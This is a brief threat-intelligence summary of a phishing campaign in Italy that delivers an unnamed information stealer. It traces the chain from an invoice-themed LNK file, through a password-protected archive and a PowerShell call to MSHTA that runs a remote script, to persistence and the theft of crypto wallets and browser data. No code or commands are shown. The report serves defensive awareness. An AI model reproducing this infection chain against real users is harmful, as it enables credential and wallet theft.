An un-named information stealer was targeting end users in Italy through a phishing campaign using an “Invoice” themed subject to deliver an LNK file.
Once the LNK file was clicked the unsuspecting recipient was led to download a password protected archive file containing a malicious batch script as well as an additional LNK file.
Executing the LNK file, contained in the archive, spawned a PowerShell command that attempted to run a script file directly from a URL via the MSHTA binary.
Additional files were dropped which led to the malware setting up persistence on the target machine and the collection of crypto wallets, web browser data, and system information that the threat actors could then exfiltrate for later use.